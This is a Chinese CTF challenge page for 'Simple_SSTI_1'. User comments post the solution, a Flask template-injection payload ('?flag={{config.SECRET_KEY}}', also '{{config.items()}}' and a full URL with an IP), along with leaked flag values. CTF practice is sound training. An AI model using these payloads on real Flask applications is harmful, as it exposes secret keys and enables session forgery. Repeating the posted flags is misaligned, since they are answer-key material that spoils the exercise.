Simple_SSTI_1WEB 未解决

分数: 5 金币: 2
题目作者: valecalida
一  血: dotast
一血奖励: 2金币
解  决: 28146
提  示:
描  述:
Simple_SSTI_1
评论
cap 2年前

这是个啥...看不懂。

回复 0
yangc 2年前

确实,一脸懵逼 。查了下好像是get请求

回复 1

guizhong 2年前

/?flag={{config.SECRET_KEY}}

回复 4

ww1539755 2年前

flag{5a55f07138eef6d7719584018fb21aa4

回复 0

Elikes 2年前

为什么是config?

回复 0

哒哒哒哒 2年前

为什么是config啊

回复 0

行走的五花肉 2年前

flag{a380d84667198e9595af337cc6e37c40}

回复 0

maniubi12212 2年前

http://114.67.175.224:11449/?flag={{config.SECRET_KEY}}

回复 4

bigbox1 2年前

?flag={{config.items()}}

回复 2

kaif 2年前

/?flag={{config.SECRET_KEY}}

回复 1

tqn0312 2年前

这是要干什么啊,一脸懵逼

回复 1
RcookieCookie 2年前

flask模板里有一个重要的配置变量叫SECRET_KEY,用注入的方法获取到这个变量的值就可以了。SSTI的意思是模板注入

回复 0

WriteUp

image
valecalida

5 金币

评分(49)

解题动态

blii 攻破了该题 1天前
ABCDHBY 攻破了该题 2天前
llc123 攻破了该题 3天前
1163064874 攻破了该题 4天前
3268798994 攻破了该题 8天前
peach.peach 攻破了该题 9天前
a5580990 攻破了该题 10天前
2269264191 攻破了该题 13天前
pezn1and 攻破了该题 13天前
1145141145 攻破了该题 14天前
IsPP 攻破了该题 14天前
prettyLife 攻破了该题 15天前
17364302189 攻破了该题 16天前
jiayouya 攻破了该题 16天前
不上早八 攻破了该题 16天前
自由魂儿儿儿 攻破了该题 17天前
forces 攻破了该题 17天前
1720713439 攻破了该题 18天前
an0n0my 攻破了该题 18天前
w1w2w3666 攻破了该题 18天前
问题反馈